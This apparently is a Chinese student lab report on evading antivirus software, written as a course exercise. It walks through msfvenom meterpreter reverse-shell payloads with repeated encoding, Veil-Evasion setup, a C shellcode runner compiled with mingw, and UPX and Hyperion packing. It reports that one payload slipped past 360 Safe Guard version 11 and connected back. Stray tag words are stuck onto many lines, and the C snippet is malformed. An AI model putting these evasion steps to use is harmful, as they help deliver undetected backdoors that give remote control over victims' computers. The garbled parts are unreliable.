1 正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧;(1.5分)php
2 經過組合應用各類技術實現惡意代碼免殺(1分)
(若是成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)java
3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(1分)shell
(1)殺軟是如何檢測出惡意代碼的?編程
分析特徵碼,惡意代碼都含有的一段代碼,簡稱特徵碼,只要包含這段代碼就被認定是惡意代碼;windows
檢測該代碼執行時是否有異常的行爲,好比打開異常端口、關閉防火牆等。數組
(2)免殺是作什麼?
經過一些手段對惡意代碼進行假裝,不被殺毒軟件檢測出。安全
(3)免殺的基本方法有哪些?網絡
改變特徵碼,改變行爲,利用現有playload手工打造一個後門程序。tcp
實驗二中生成的後門程序,在virscan網站中掃描
工具
經過圖片能夠看到,不加處理的惡意代碼能被絕大多數殺毒軟件識別。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=攻擊機的IP LPORT=端口號 -f exe > xxx.exe
進行10次編碼試試下降檢出率
在virscan網站中掃描
雖然進行屢次編碼,但特徵碼仍存在,所以依舊能被絕大多數殺毒軟件檢測出來。
msfvenom -p php/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.php
在virscan網站中掃描
msfvenom -p java/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.jar
在virscan網站中掃描
安裝veil成功以後,輸入veil
,再用use evasion
命令
輸入命令use c/meterpreter/rev_tcp.py
進入配置界面
設置反彈鏈接IP:set LHOST 此處IP爲Kali IP
設置端口:set LPORT 5219
輸入generate
生成文件,而後輸入playload的名字
在目錄 /usr/share/veil-output/compiled
裏找到咱們生成的文件,在virscan網站中掃描
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊機ip LPORT=端口號 -f c
生成一段c語言格式的shellcode數組
編輯一個.c文件
unsigned char buf[] = int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ 20165219.c -o 20165219.exe
編譯後變成可執行文件
進行檢測
windows上用殺軟檢測
對上面的shellcode加殼
檢測
將wyb_upxed.exe拷貝到/usr/share/windows-binaries/hyperion/
端輸入命令wine hyperion.exe -v wyb_upxed.exe wyb_upxed_Hyperion.exe
對半手工製做shellcode加壓縮殼不能達到免殺的目的,加密殼有必定的概率是能夠達到了免殺的目的。
加密殼的免殺和反彈鏈接
對方電腦的殺毒軟件爲:360安全衛士 版本11
免殺的截圖
回連成功的結果圖
沒有成功安裝veil
解決辦法:拷了別的同窗安裝好veil的虛擬機
免殺技術單一,跟不上病毒庫的更新,之後應該嘗試多種技術的組合
學習完本次的實驗對免殺原理有了深層次的瞭解,爲之後防範惡意軟件攻擊打下了基礎。